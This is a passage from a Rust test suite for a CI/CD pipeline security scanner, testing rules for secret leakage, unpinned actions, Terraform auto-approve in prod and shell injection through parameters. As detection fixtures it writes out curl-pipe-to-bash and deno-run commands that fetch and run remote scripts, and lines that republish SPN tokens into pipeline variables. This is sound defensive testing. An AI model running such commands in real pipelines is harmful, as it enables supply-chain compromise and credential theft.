    let findings = secret_materialised_to_workspace_file(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn echoing_secret_to_stdout_not_flagged_by_materialisation_rule() {
    // Secret only reaches stdout — no file is written.
    let g = build_step_with_script("TF_TOKEN", "echo using $(TF_TOKEN)\nterraform init");
    let findings = secret_materialised_to_workspace_file(&g);
    assert!(
        findings.is_empty(),
        "stdout echo (no file sink) must not trip materialisation rule"
    );
}
#[test]
fn write_to_unrelated_path_not_flagged() {
    // No workspace-path keyword, no risky extension — should not fire.
    let script = "echo $(MY_SECRET) > /var/tmp/ignore.log";
    let g = build_step_with_script("MY_SECRET", script);
    let findings = secret_materialised_to_workspace_file(&g);
    assert!(findings.is_empty());
}
// ── keyvault_secret_to_plaintext ─────────────────────────
#[test]
fn keyvault_asplaintext_flagged() {
    // `-AsPlainText` pulls the secret out of SecureString handling.
    let script = "$pass = Get-AzKeyVaultSecret -VaultName foo -Name bar -AsPlainText\n\
Write-Host done";
    let g = build_step_with_script("UNUSED", script);
    let findings = keyvault_secret_to_plaintext(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::Medium);
}
#[test]
fn keyvault_secretvaluetext_legacy_pattern_flagged() {
    // Legacy `.SecretValueText` accessor — same plaintext exposure.
    let script = "$pwd = (Get-AzKeyVaultSecret -VaultName foo -Name bar).SecretValueText";
    let g = build_step_with_script("UNUSED", script);
    let findings = keyvault_secret_to_plaintext(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn convertfrom_securestring_asplaintext_flagged() {
    // ConvertFrom-SecureString -AsPlainText also strips the protection.
    let script = "$plain = ConvertFrom-SecureString $sec -AsPlainText";
    let g = build_step_with_script("UNUSED", script);
    let findings = keyvault_secret_to_plaintext(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn keyvault_securestring_handling_not_flagged() {
    // Using the secret as SecureString (no -AsPlainText) is the safe pattern.
    let script = "$sec = Get-AzKeyVaultSecret -VaultName foo -Name bar\n\
$cred = New-Object PSCredential 'svc', $sec.SecretValue";
    let g = build_step_with_script("UNUSED", script);
    let findings = keyvault_secret_to_plaintext(&g);
    assert!(
        findings.is_empty(),
        "SecureString-only handling is the recommended pattern and must not fire"
    );
}
// ── terraform_auto_approve_in_prod ──────────────────────
/// Test helper: add a `Step` node named `name` to `g`, carrying the
/// given metadata key/value pairs (both sides copied into owned strings).
/// Returns the id of the newly added node.
fn step_with_meta(g: &mut AuthorityGraph, name: &str, meta: &[(&str, &str)]) -> NodeId {
    // Build the owned metadata map in one pass instead of insert-in-a-loop.
    let metadata: std::collections::HashMap<String, String> = meta
        .iter()
        .map(|(k, v)| ((*k).to_string(), (*v).to_string()))
        .collect();
    g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, metadata)
}
#[test]
fn terraform_auto_approve_against_prod_connection_fires() {
    // `-auto-approve` apply against a prod-named service connection.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "Terraform : Apply",
        &[
            (META_TERRAFORM_AUTO_APPROVE, "true"),
            (META_SERVICE_CONNECTION_NAME, "sharedservice-w365-prod-sc"),
        ],
    );
    let findings = terraform_auto_approve_in_prod(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::Critical);
    assert_eq!(
        findings[0].category,
        FindingCategory::TerraformAutoApproveInProd
    );
    assert!(
        findings[0].message.contains("sharedservice-w365-prod-sc"),
        "message should name the connection, got: {}",
        findings[0].message
    );
}
#[test]
fn terraform_auto_approve_via_edge_to_service_connection_identity() {
    // Prod-ness discovered via a HasAccessTo edge to a service-connection
    // Identity node rather than via step metadata.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    let step = step_with_meta(
        &mut g,
        "Terraform : Apply",
        &[(META_TERRAFORM_AUTO_APPROVE, "true")],
    );
    let mut id_meta = std::collections::HashMap::new();
    id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
    let conn = g.add_node_with_metadata(
        NodeKind::Identity,
        "alz-infra-sc-prd-uks",
        TrustZone::FirstParty,
        id_meta,
    );
    g.add_edge(step, conn, EdgeKind::HasAccessTo);
    let findings = terraform_auto_approve_in_prod(&g);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
}
#[test]
fn terraform_auto_approve_with_env_gate_downgrades_to_medium() {
    // Per blue-team CC-4: env gate is a partial control (the gate's
    // approver list is invisible from YAML), so the finding stays
    // visible at Medium rather than disappearing entirely.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "Terraform : Apply",
        &[
            (META_TERRAFORM_AUTO_APPROVE, "true"),
            (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
            (META_ENV_APPROVAL, "true"),
        ],
    );
    let findings = terraform_auto_approve_in_prod(&g);
    assert_eq!(
        findings.len(),
        1,
        "env-gated apply must still emit a finding"
    );
    assert_eq!(
        findings[0].severity,
        Severity::Medium,
        "env-gated apply downgrades Critical → Medium (compensating control credit)"
    );
    assert!(findings[0]
        .message
        .contains("`environment:` binding present"));
}
#[test]
fn terraform_auto_approve_against_non_prod_does_not_fire() {
    // Auto-approve against a dev connection is out of scope for this rule.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "Terraform : Apply",
        &[
            (META_TERRAFORM_AUTO_APPROVE, "true"),
            (META_SERVICE_CONNECTION_NAME, "platform-dev-sc"),
        ],
    );
    let findings = terraform_auto_approve_in_prod(&g);
    assert!(findings.is_empty(), "dev connection must not match prod");
}
#[test]
fn terraform_apply_without_auto_approve_does_not_fire() {
    // Interactive (non-auto-approve) apply — the compound condition is absent.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "Terraform : Apply",
        &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
    );
    let findings = terraform_auto_approve_in_prod(&g);
    assert!(findings.is_empty());
}
#[test]
fn looks_like_prod_connection_matches_real_world_names() {
    // Unit-level check of the prod-name classifier.
    assert!(looks_like_prod_connection("sharedservice-w365-prod-sc"));
    assert!(looks_like_prod_connection("alz-infra-sc-prd"));
    assert!(looks_like_prod_connection("prod-tenant-arm"));
    assert!(looks_like_prod_connection("PROD"));
    assert!(looks_like_prod_connection("my_prod_arm"));
    // Negatives — substrings inside other words must not match
    assert!(!looks_like_prod_connection("approver-sc"));
    assert!(!looks_like_prod_connection("reproducer-sc"));
    assert!(!looks_like_prod_connection("dev-sc"));
    assert!(!looks_like_prod_connection("staging"));
}
// ── addspn_with_inline_script ───────────────────────────
#[test]
fn addspn_with_inline_script_fires_with_basic_body() {
    // addSpnToEnvironment plus any inline script body → fires at High,
    // without the laundering escalation text.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "ado : azure : login (federated)",
        &[
            (META_ADD_SPN_TO_ENV, "true"),
            (META_SCRIPT_BODY, "az account show --query id -o tsv"),
        ],
    );
    let findings = addspn_with_inline_script(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::High);
    assert!(!findings[0]
        .message
        .contains("explicit token laundering detected"));
}
#[test]
fn addspn_with_inline_script_escalates_message_on_token_laundering() {
    // Script republishes the SPN token via ##vso[task.setvariable] —
    // the finding message must call that out explicitly.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "ado : azure : login (federated)",
        &[
            (META_ADD_SPN_TO_ENV, "true"),
            (
                META_SCRIPT_BODY,
                "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\"",
            ),
        ],
    );
    let findings = addspn_with_inline_script(&g);
    assert_eq!(findings.len(), 1);
    assert!(
        findings[0]
            .message
            .contains("explicit token laundering detected"),
        "message should escalate, got: {}",
        findings[0].message
    );
}
#[test]
fn addspn_without_inline_script_does_not_fire() {
    // No META_SCRIPT_BODY → scriptPath form, not inline
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "AzureCLI scriptPath",
        &[(META_ADD_SPN_TO_ENV, "true")],
    );
    let findings = addspn_with_inline_script(&g);
    assert!(findings.is_empty());
}
#[test]
fn inline_script_without_addspn_does_not_fire() {
    // Inline script alone, without addSpnToEnvironment, is out of scope.
    let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
    step_with_meta(
        &mut g,
        "az account show",
        &[(META_SCRIPT_BODY, "az account show")],
    );
    let findings = addspn_with_inline_script(&g);
    assert!(findings.is_empty());
}
#[test]
fn script_launders_spn_token_recognises_known_markers() {
    // Unit-level check of the laundering detector.
    assert!(script_launders_spn_token(
        "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\""
    ));
    assert!(script_launders_spn_token(
        "echo \"##vso[task.setvariable variable=X]$env:servicePrincipalKey\""
    ));
    // setvariable without token material → not laundering, just env mutation
    assert!(!script_launders_spn_token(
        "echo \"##vso[task.setvariable variable=X]hello\""
    ));
    // No setvariable at all
    assert!(!script_launders_spn_token("$env:idToken"));
}
// ── parameter_interpolation_into_shell ──────────────────
/// Test helper: fresh `azure-pipelines.yml` graph with a single declared
/// pipeline parameter `name` described by `spec`.
fn graph_with_param(spec: ParamSpec, name: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.parameters.insert(name.to_owned(), spec);
    graph
}
#[test]
fn parameter_interpolation_fires_on_free_form_string_in_inline_script() {
    // Free-form string parameter compile-time-expanded into a shell line.
    let mut g = graph_with_param(
        ParamSpec {
            param_type: "string".into(),
            has_values_allowlist: false,
        },
        "appName",
    );
    step_with_meta(
        &mut g,
        "terraform workspace",
        &[(
            META_SCRIPT_BODY,
            "terraform workspace select -or-create ${{ parameters.appName }}",
        )],
    );
    let findings = parameter_interpolation_into_shell(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::Medium);
    assert!(findings[0].message.contains("appName"));
}
#[test]
fn parameter_interpolation_with_values_allowlist_does_not_fire() {
    // A `values:` allowlist constrains the parameter to known-safe inputs.
    let mut g = graph_with_param(
        ParamSpec {
            param_type: "string".into(),
            has_values_allowlist: true,
        },
        "location",
    );
    step_with_meta(
        &mut g,
        "Terraform Plan",
        &[(
            META_SCRIPT_BODY,
            "terraform plan -var=\"location=${{ parameters.location }}\"",
        )],
    );
    let findings = parameter_interpolation_into_shell(&g);
    assert!(
        findings.is_empty(),
        "values: allowlist must suppress the finding"
    );
}
#[test]
fn parameter_interpolation_default_type_is_treated_as_string() {
    let mut g = graph_with_param(
        ParamSpec {
            // ADO defaults missing `type:` to string — same risk
            param_type: "".into(),
            has_values_allowlist: false,
        },
        "appName",
    );
    step_with_meta(
        &mut g,
        "Terraform : Plan",
        &[(
            META_SCRIPT_BODY,
            "terraform plan -var \"appName=${{ parameters.appName }}\"",
        )],
    );
    let findings = parameter_interpolation_into_shell(&g);
    assert_eq!(findings.len(), 1, "missing type: must default to string");
}
#[test]
fn parameter_interpolation_skips_non_string_params() {
    // Typed (non-string) parameters cannot smuggle arbitrary shell text.
    let mut g = graph_with_param(
        ParamSpec {
            param_type: "boolean".into(),
            has_values_allowlist: false,
        },
        "enabled",
    );
    step_with_meta(
        &mut g,
        "step",
        &[(META_SCRIPT_BODY, "echo ${{ parameters.enabled }}")],
    );
    let findings = parameter_interpolation_into_shell(&g);
    assert!(findings.is_empty(), "boolean params can't carry shell");
}
#[test]
fn parameter_interpolation_no_spaces_form_also_matches() {
    // `${{parameters.x}}` (no inner spaces) is equally valid ADO syntax.
    let mut g = graph_with_param(
        ParamSpec {
            param_type: "string".into(),
            has_values_allowlist: false,
        },
        "x",
    );
    step_with_meta(
        &mut g,
        "step",
        &[(META_SCRIPT_BODY, "echo ${{parameters.x}}")],
    );
    let findings = parameter_interpolation_into_shell(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn parameter_interpolation_skips_step_without_script_body() {
    // Parameter declared, but no inline script anywhere to interpolate it.
    let mut g = graph_with_param(
        ParamSpec {
            param_type: "string".into(),
            has_values_allowlist: false,
        },
        "appName",
    );
    // Step has no META_SCRIPT_BODY (e.g. a typed task without an inline script)
    g.add_node(NodeKind::Step, "task-step", TrustZone::Untrusted);
    let findings = parameter_interpolation_into_shell(&g);
    assert!(findings.is_empty());
}
// ── runtime_script_fetched_from_floating_url ───────────────
/// Test helper: graph with one first-party Step ("install") whose
/// META_SCRIPT_BODY metadata is set to `body`.
fn step_with_body(body: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let step = graph.add_node(NodeKind::Step, "install", TrustZone::FirstParty);
    if let Some(node) = graph.nodes.get_mut(step) {
        node.metadata
            .insert(META_SCRIPT_BODY.into(), body.to_owned());
    }
    graph
}
#[test]
fn floating_curl_pipe_bash_master_is_flagged() {
    // curl | bash from a mutable `master` path — classic floating fetch.
    let g = step_with_body(
        "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash",
    );
    let findings = runtime_script_fetched_from_floating_url(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::High);
    assert_eq!(
        findings[0].category,
        FindingCategory::RuntimeScriptFetchedFromFloatingUrl
    );
}
#[test]
fn floating_deno_run_main_is_flagged() {
    // `deno run <url>` executes the remote script directly, no pipe needed.
    let g = step_with_body(
        "deno run https://raw.githubusercontent.com/denoland/deno/refs/heads/main/tools/verify_pr_title.js \"$PR_TITLE\"",
    );
    let findings = runtime_script_fetched_from_floating_url(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn pinned_curl_url_with_tag_not_flagged() {
    // Tag-pinned URL path (`v0.33.10`) — contents are immutable.
    let g = step_with_body(
        "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/v0.33.10/scripts/install.sh | bash",
    );
    let findings = runtime_script_fetched_from_floating_url(&g);
    assert!(findings.is_empty(), "tag-pinned URL must not fire");
}
#[test]
fn curl_without_pipe_to_shell_not_flagged() {
    // `curl -O` writes to disk; the script isn't executed inline.
    let g = step_with_body(
        "curl -sSLO https://raw.githubusercontent.com/rust-lang/rust/master/src/tools/linkchecker/linkcheck.sh",
    );
    let findings = runtime_script_fetched_from_floating_url(&g);
    assert!(findings.is_empty(), "download-only must not fire");
}
#[test]
fn bash_process_substitution_curl_main_is_flagged() {
    // `bash <(curl ...)` is equivalent to the pipe-to-shell form.
    let g = step_with_body(
        "bash <(curl -s https://raw.githubusercontent.com/some/repo/main/install.sh)",
    );
    let findings = runtime_script_fetched_from_floating_url(&g);
    assert_eq!(findings.len(), 1);
}
// ── pr_trigger_with_floating_action_ref ────────────────────
/// Test helper: graph for `pr.yml` carrying the workflow-level trigger
/// string and a third-party Image node holding the action reference.
fn graph_with_trigger_and_action(trigger: &str, action: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("pr.yml"));
    graph.metadata.insert(META_TRIGGER.into(), trigger.into());
    graph.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
    graph
}
#[test]
fn pull_request_target_with_floating_main_action_flagged_critical() {
    // Privileged trigger + mutable action ref → the compound Critical.
    let g = graph_with_trigger_and_action("pull_request_target", "actions/checkout@main");
    let findings = pr_trigger_with_floating_action_ref(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::Critical);
    assert_eq!(
        findings[0].category,
        FindingCategory::PrTriggerWithFloatingActionRef
    );
}
#[test]
fn pull_request_target_with_sha_pinned_action_not_flagged() {
    // SHA-pinned action ref is immutable — compound rule stays silent.
    let g = graph_with_trigger_and_action(
        "pull_request_target",
        "denoland/setup-deno@667a34cdef165d8d2b2e98dde39547c9daac7282",
    );
    let findings = pr_trigger_with_floating_action_ref(&g);
    assert!(findings.is_empty());
}
#[test]
fn issue_comment_with_floating_action_flagged() {
    // `issue_comment` also runs with base-repo authority.
    let g = graph_with_trigger_and_action("issue_comment", "foo/bar@v1");
    let findings = pr_trigger_with_floating_action_ref(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn pull_request_only_does_not_trigger_critical_compound_rule() {
    // `pull_request` (without `_target`) is the safe trigger — no base
    // repo write. Rule 4 must not fire on it.
    let g = graph_with_trigger_and_action("pull_request", "foo/bar@main");
    let findings = pr_trigger_with_floating_action_ref(&g);
    assert!(
        findings.is_empty(),
        "pull_request alone must not produce a critical compound finding"
    );
}
#[test]
fn comma_separated_trigger_with_pull_request_target_flagged() {
    // A privileged trigger anywhere in the comma-joined trigger list counts.
    let g = graph_with_trigger_and_action(
        "pull_request_target,push,workflow_dispatch",
        "foo/bar@main",
    );
    let findings = pr_trigger_with_floating_action_ref(&g);
    assert_eq!(findings.len(), 1);
}
// ── untrusted_api_response_to_env_sink ─────────────────────
/// Test helper: graph for `consumer.yml` with the given workflow trigger
/// and one first-party Step ("capture") whose script body is `body`.
fn graph_with_trigger_and_step_body(trigger: &str, body: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("consumer.yml"));
    graph.metadata.insert(META_TRIGGER.into(), trigger.into());
    let step = graph.add_node(NodeKind::Step, "capture", TrustZone::FirstParty);
    if let Some(node) = graph.nodes.get_mut(step) {
        node.metadata
            .insert(META_SCRIPT_BODY.into(), body.to_owned());
    }
    graph
}
#[test]
fn workflow_run_gh_pr_view_to_github_env_flagged() {
    // Attacker-influenced `gh pr view` output appended to $GITHUB_ENV.
    let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json 'number' --jq '\"PR_NUMBER=\\(.number)\"' >> $GITHUB_ENV";
    let g = graph_with_trigger_and_step_body("workflow_run", body);
    let findings = untrusted_api_response_to_env_sink(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn workflow_run_without_env_sink_not_flagged() {
    // API read without the $GITHUB_ENV write — no sink, no finding.
    let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json number";
    let g = graph_with_trigger_and_step_body("workflow_run", body);
    let findings = untrusted_api_response_to_env_sink(&g);
    assert!(findings.is_empty());
}
#[test]
fn push_trigger_writing_to_env_not_flagged() {
    // Trigger is not in scope (push isn't a cross-workflow trust boundary)
    let body = "gh pr view --json number --jq .number >> $GITHUB_ENV";
    let g = graph_with_trigger_and_step_body("push", body);
    let findings = untrusted_api_response_to_env_sink(&g);
    assert!(findings.is_empty());
}
#[test]
fn workflow_run_multiline_capture_then_write_flagged() {
    // Capture into a shell var on one line, env write on the next line.
    let body = "VAL=$(gh api repos/foo/bar/pulls/$PR --jq .head.ref)\necho \"BRANCH=$VAL\" >> $GITHUB_ENV";
    let g = graph_with_trigger_and_step_body("workflow_run", body);
    let findings = untrusted_api_response_to_env_sink(&g);
    assert_eq!(findings.len(), 1);
}
// ── pr_build_pushes_image_with_floating_credentials ────────
/// Test helper: graph for `pr-build.yml` with the given trigger and a
/// third-party Image node holding the (login) action reference.
fn graph_pr_with_login_action(trigger: &str, action: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source("pr-build.yml"));
    graph.metadata.insert(META_TRIGGER.into(), trigger.into());
    graph.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
    graph
}
#[test]
fn pr_with_floating_login_to_gar_flagged() {
    // PR build + floating registry-login action → push credentials
    // reachable from fork-controlled code.
    let g = graph_pr_with_login_action(
        "pull_request",
        "grafana/shared-workflows/actions/login-to-gar@main",
    );
    let findings = pr_build_pushes_image_with_floating_credentials(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::High);
    assert_eq!(
        findings[0].category,
        FindingCategory::PrBuildPushesImageWithFloatingCredentials
    );
}
#[test]
fn pr_with_floating_docker_login_action_flagged() {
    // docker/login-action pinned only to a mutable tag (`v3`).
    let g = graph_pr_with_login_action("pull_request", "docker/login-action@v3");
    let findings = pr_build_pushes_image_with_floating_credentials(&g);
    assert_eq!(findings.len(), 1);
}
#[test]
fn pr_with_sha_pinned_docker_login_not_flagged() {
    // SHA-pinned login action is immutable — rule stays silent.
    let g = graph_pr_with_login_action(
        "pull_request",
        "docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d",
    );
    let findings = pr_build_pushes_image_with_floating_credentials(&g);
    assert!(findings.is_empty());
}
#[test]
fn push_trigger_with_floating_login_action_not_flagged() {
    // Outside PR context — different rule (unpinned_action) covers it.
    let g = graph_pr_with_login_action("push", "docker/login-action@v3");
    let findings = pr_build_pushes_image_with_floating_credentials(&g);
    assert!(findings.is_empty());
}
#[test]
fn pr_with_unrelated_unpinned_action_not_flagged() {
    // Rule scopes itself to registry-login actions only; generic actions
    // are covered by `unpinned_action` and `pr_trigger_with_floating_action_ref`.
    let g = graph_pr_with_login_action("pull_request", "actions/checkout@v4");
    let findings = pr_build_pushes_image_with_floating_credentials(&g);
    assert!(findings.is_empty());
}
// ── unpinned_action severity tiering ─────────────────────────
#[test]
fn unpinned_action_well_known_first_party_is_medium() {
// `actions/checkout@v4` — owner is the GitHub-maintained `actions`
// org. The supply-chain surface is real but operationally narrow,
// so the rule emits Medium rather than the default High.
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
let findings = unpinned_action(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
}
#[test]
fn unpinned_action_same_repo_composite_is_info() {
    // `./.github/actions/setup` — same-repo composite action. No
    // external supply-chain surface, so the rule emits Info as a
    // hygiene-only signal rather than a security finding.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    graph.add_node(
        NodeKind::Image,
        "./.github/actions/setup",
        TrustZone::FirstParty,
    );
    let findings = unpinned_action(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Info);
    assert_eq!(finding.category, FindingCategory::UnpinnedAction);
}
#[test]
fn unpinned_action_unknown_owner_is_high() {
    // `random-org/foo@v1` — unknown owner, full unbounded supply-chain
    // surface. This is the case the rule was originally designed for
    // and the only severity tier that still emits at High.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    graph.add_node(NodeKind::Image, "random-org/foo@v1", TrustZone::Untrusted);
    let findings = unpinned_action(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::High);
    assert_eq!(finding.category, FindingCategory::UnpinnedAction);
}
#[test]
fn unpinned_action_self_hosted_runner_label_not_flagged() {
    // Self-hosted runner labels are FirstParty Image nodes too — but
    // they aren't action references and have no @version to pin. The
    // rule must skip them (META_SELF_HOSTED is the marker).
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let meta = std::collections::HashMap::from([(META_SELF_HOSTED.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Image, "self-hosted", TrustZone::FirstParty, meta);
    let findings = unpinned_action(&graph);
    assert!(
        findings.is_empty(),
        "self-hosted runner labels must not be flagged as unpinned actions: {findings:#?}"
    );
}
// ── authority_propagation clustering ─────────────────────────
#[test]
fn authority_propagation_clusters_one_secret_to_three_sinks() {
    // One secret, three different untrusted sinks reached via separate
    // propagation paths. After clustering, the rule must emit ONE
    // finding listing all three sinks in `nodes_involved`.
    let mut g = AuthorityGraph::new(source("ci.yml"));
    let secret = g.add_node(NodeKind::Secret, "GITHUB_TOKEN", TrustZone::FirstParty);
    let trampoline = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    let sink_a = g.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
    let sink_b = g.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
    let sink_c = g.add_node(NodeKind::Step, "deploy[2]", TrustZone::Untrusted);
    // A single trampoline step both holds the secret and delegates to
    // all three sinks, yielding three distinct secret→sink paths.
    g.add_edge(trampoline, secret, EdgeKind::HasAccessTo);
    g.add_edge(trampoline, sink_a, EdgeKind::DelegatesTo);
    g.add_edge(trampoline, sink_b, EdgeKind::DelegatesTo);
    g.add_edge(trampoline, sink_c, EdgeKind::DelegatesTo);
    // NOTE(review): `4` looks like a propagation depth/limit argument —
    // confirm against authority_propagation's signature.
    let findings = authority_propagation(&g, 4);
    assert_eq!(
        findings.len(),
        1,
        "three propagation paths from one secret must collapse to one finding, got: {findings:#?}"
    );
    let f = &findings[0];
    assert_eq!(f.category, FindingCategory::AuthorityPropagation);
    assert_eq!(f.severity, Severity::Critical);
    // [source, sink_a, sink_b, sink_c] — order preserved by insertion.
    assert_eq!(f.nodes_involved.len(), 4);
    assert_eq!(f.nodes_involved[0], secret);
    assert!(f.nodes_involved.contains(&sink_a));
    assert!(f.nodes_involved.contains(&sink_b));
    assert!(f.nodes_involved.contains(&sink_c));
    // Message format is flexible: either an aggregate count ("3 sinks")
    // or the individual sink names may appear.
    assert!(
        f.message.contains("3 sinks")
            || f.message.contains("deploy[0]") && f.message.contains("deploy[2]"),
        "cluster message must mention the multiple sinks: {}",
        f.message
    );
}
#[test]
fn authority_propagation_does_not_cluster_separate_secrets() {
    // Three independent secrets, each reaching one sink. The clustering
    // is keyed on the source node, so each secret's path becomes its own
    // finding — three findings total, not one.
    let mut g = AuthorityGraph::new(source("ci.yml"));
    // Node creation order matches the original declaration order:
    // secrets first, then steps, then sinks.
    let secrets = ["TOKEN_A", "TOKEN_B", "TOKEN_C"]
        .map(|name| g.add_node(NodeKind::Secret, name, TrustZone::FirstParty));
    let steps = ["step_a", "step_b", "step_c"]
        .map(|name| g.add_node(NodeKind::Step, name, TrustZone::FirstParty));
    let sinks = ["sink_a", "sink_b", "sink_c"]
        .map(|name| g.add_node(NodeKind::Step, name, TrustZone::Untrusted));
    for i in 0..3 {
        g.add_edge(steps[i], secrets[i], EdgeKind::HasAccessTo);
        g.add_edge(steps[i], sinks[i], EdgeKind::DelegatesTo);
    }
    let findings = authority_propagation(&g, 4);
    assert_eq!(
        findings.len(),
        3,
        "one finding per distinct source secret, got: {findings:#?}"
    );
    let sources: std::collections::HashSet<_> =
        findings.iter().map(|f| f.nodes_involved[0]).collect();
    for secret in secrets {
        assert!(sources.contains(&secret));
    }
}
// ── secret_via_env_gate_to_untrusted_consumer ──────────────────────
/// Build a graph with one job containing a configurable sequence of
/// steps. Each tuple is (name, trust_zone, writes_env_gate, reads_env,
/// secret_to_link). Returns the graph plus the assigned NodeIds in
/// declaration order so tests can assert on specific nodes.
fn job_with_steps(
    job: &str,
    steps: &[(&str, TrustZone, bool, bool, Option<&str>)],
) -> (AuthorityGraph, Vec<NodeId>) {
    let mut g = AuthorityGraph::new(source("ci.yml"));
    // Secret nodes are deduplicated by name so two steps naming the
    // same secret share a single node.
    let mut secret_ids: std::collections::HashMap<String, NodeId> =
        std::collections::HashMap::new();
    let mut step_ids = Vec::with_capacity(steps.len());
    for &(name, zone, writes_gate, reads_env, secret) in steps {
        let mut meta = std::collections::HashMap::new();
        meta.insert(META_JOB_NAME.into(), job.into());
        if writes_gate {
            meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
        }
        if reads_env {
            meta.insert(META_READS_ENV.into(), "true".into());
        }
        let step_id = g.add_node_with_metadata(NodeKind::Step, name, zone, meta);
        if let Some(secret_name) = secret {
            let secret_id = *secret_ids.entry(secret_name.to_string()).or_insert_with(|| {
                g.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty)
            });
            g.add_edge(step_id, secret_id, EdgeKind::HasAccessTo);
        }
        step_ids.push(step_id);
    }
    (g, step_ids)
}
#[test]
fn env_gate_writer_then_untrusted_reader_fires() {
    // FirstParty writer holding a secret writes the env gate; a later
    // untrusted step in the same job reads the env back out.
    let steps: &[(&str, TrustZone, bool, bool, Option<&str>)] = &[
        ("setup", TrustZone::FirstParty, true, false, Some("CLOUD_KEY")),
        ("deploy", TrustZone::Untrusted, false, true, None),
    ];
    let (g, _ids) = job_with_steps("build", steps);
    let findings = secret_via_env_gate_to_untrusted_consumer(&g);
    assert_eq!(findings.len(), 1, "writer + untrusted reader must fire");
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Critical);
    assert!(
        finding.message.contains("CLOUD_KEY"),
        "message must name the laundered secret"
    );
    assert!(
        finding.message.contains("deploy"),
        "message must name the consumer step"
    );
}
#[test]
fn env_gate_writer_then_first_party_reader_does_not_fire() {
    // First-party consumer is the legitimate use of $GITHUB_ENV — the
    // entire point of the gate. Only flagged when the consumer's trust
    // zone is reduced.
    let steps: &[(&str, TrustZone, bool, bool, Option<&str>)] = &[
        ("setup", TrustZone::FirstParty, true, false, Some("CLOUD_KEY")),
        ("use-it", TrustZone::FirstParty, false, true, None),
    ];
    let (g, _) = job_with_steps("build", steps);
    assert!(
        secret_via_env_gate_to_untrusted_consumer(&g).is_empty(),
        "first-party reader is the intended use; must not fire"
    );
}
#[test]
fn env_gate_write_of_non_secret_value_does_not_fire() {
    // Writer step doesn't hold any Secret/Identity — it's writing a
    // benign value (build version, config flag) into the env. Out of
    // scope: the env gate isn't laundering authority across a trust
    // boundary because there's no authority to launder.
    let steps: &[(&str, TrustZone, bool, bool, Option<&str>)] = &[
        ("setup", TrustZone::FirstParty, true, false, None),
        ("deploy", TrustZone::Untrusted, false, true, None),
    ];
    let (g, _) = job_with_steps("build", steps);
    assert!(
        secret_via_env_gate_to_untrusted_consumer(&g).is_empty(),
        "env-gate write of non-authority value must not fire"
    );
}
#[test]
fn writer_in_different_job_does_not_fire() {
    // The env gate only propagates within a job — a writer in job A
    // cannot reach a consumer in job B even if both jobs run on the
    // same runner. Same-job constraint enforced via META_JOB_NAME.
